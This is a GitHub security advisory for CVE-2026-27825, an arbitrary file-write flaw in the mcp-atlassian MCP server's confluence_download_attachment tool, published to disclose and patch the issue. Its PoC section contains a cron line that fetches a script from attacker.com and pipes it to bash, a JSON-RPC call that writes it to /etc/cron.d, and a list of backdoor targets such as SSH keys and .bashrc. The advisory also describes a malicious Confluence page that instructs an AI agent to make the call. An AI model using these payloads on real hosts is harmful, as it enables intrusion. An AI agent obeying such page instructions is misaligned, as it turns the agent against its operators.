Skip to content

MCP Atlassian has an arbitrary file write leading to arbitrary code execution via unconstrained download_path in confluence_download_attachment

Critical severity GitHub Reviewed Published Feb 24, 2026 in sooperset/mcp-atlassian • Updated Mar 10, 2026

Package

pip mcp-atlassian (pip)

Affected versions

< 0.17.0

Patched versions

0.17.0

Description

Summary

The confluence_download_attachment MCP tool accepts a download_path parameter that is written to without any directory boundary enforcement. An attacker who can call this tool and supply or access a Confluence attachment with malicious content can write arbitrary content to any path the server process has write access to. Because the attacker controls both the write destination and the written content (via an uploaded Confluence attachment), this constitutes for arbitrary code execution (for example, writing a valid cron entry to /etc/cron.d/ achieves code execution within one scheduler cycle with no server restart required).

Details

The tool parameter is defined in src/mcp_atlassian/servers/confluence.py:~1275 without any path restriction:

download_path: Annotated[
    str,
    Field(
        description=(
            "Full path where the file should be saved. Can be absolute or relative. "
            "Examples: './downloads/report.pdf', '/tmp/image.png', 'C:\\\\temp\\\\file.docx'. "
            "Parent directory will be created if it doesn't exist."
        )
    ),
],

The implementation at src/mcp_atlassian/confluence/attachments.py:183200:

if not os.path.isabs(target_path):
    target_path = os.path.abspath(target_path)  # normalizes path, no restriction

os.makedirs(os.path.dirname(target_path), exist_ok=True)  # creates any directory
with open(target_path, "wb") as f:                        # writes to any writable path
    for chunk in response.iter_content(chunk_size=8192):
        f.write(chunk)

os.path.abspath() converts relative paths to absolute but performs no directory boundary check. No configurable base download directory is enforced. There is no validation between the tool parameter and the file write. The same issue exists in download_content_attachments via its target_dir parameter (src/mcp_atlassian/servers/confluence.py:~1389).


### PoC
Prerequisites: Confluence credentials with access to at least one page. To control the written file content, upload a malicious attachment to any Confluence page you have write access to.

Step 1Prepare the payload. Create a file containing a valid cron entry and upload it as a Confluence attachment:

* * * * * root curl http://attacker.com/shell.sh | bash

Step 2Call the tool with a sensitive write target:

{
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "confluence_download_attachment",
        "arguments": {
            "page_id": "<page id hosting the malicious attachment>",
            "attachment_id": "<attachment id>",
            "download_path": "/etc/cron.d/mcp-backdoor"
        }
    },
    "id": 1
}

The attachment content is written verbatim to /etc/cron.d/mcp-backdoor. The system scheduler executes it within one minute with no further attacker action required.

Alternative potential write targets demonstrating broader impact:
- /home/<user>/.ssh/authorized_keys - persistent SSH backdoor
- <venv>/lib/python3.x/site-packages/<any_imported_module>.py - code execution on next import
- ~/.bashrc - code execution on next user login

### Impact
An attacker who can invoke MCP tools and upload (or access) a Confluence attachment with controlled content can achieve arbitrary code execution on the server host. The MCP HTTP transport endpoints carry no authentication by default, meaning any host that can reach the server's HTTP port can call tools using the server's own embedded Confluence credentials (global fallback). The default HOST=0.0.0.0 binding makes this reachable from the local network without any configuration change.

In enterprise deployments where Confluence write access is broadly granted, the effective attacker prerequisite reduces to network access to the MCP HTTP port. This is also reachable without direct network access: a malicious Confluence page can embed LLM instructions directing an AI agent to call confluence_download_attachment with attacker-specified parameters, achieving code execution through the agent as an unwitting intermediary.

Example potential RCE paths:
1. Cron job injection - write a cron entry to /etc/cron.d/; executes within one scheduler cycle, no restart required
2. Python package hijack - overwrite any .py module in the application's virtual environment; executes on next import or server restart.
3. SSH authorized_keys - write an attacker-controlled public key; grants persistent interactive shell access.
4. Shell profile injection - write to ~/.bashrc or ~/.profile; executes on next user login.
### References
- https://github.com/sooperset/mcp-atlassian/security/advisories/GHSA-xjgw-4wvw-rgm4
- https://github.com/sooperset/mcp-atlassian/commit/52b9b0997681e87244b20d58034deae89c91631e
@sooperset sooperset published to sooperset/mcp-atlassian Feb 24, 2026
Published to the GitHub Advisory Database Mar 10, 2026
Reviewed Mar 10, 2026
Last updated Mar 10, 2026

Severity

Critical

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Adjacent
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(6th percentile)

Weaknesses

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Learn more on MITRE.

External Control of File Name or Path

The product allows user input to control or influence paths or file names that are used in filesystem operations. Learn more on MITRE.

CVE ID

CVE-2026-27825

GHSA ID

GHSA-xjgw-4wvw-rgm4

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.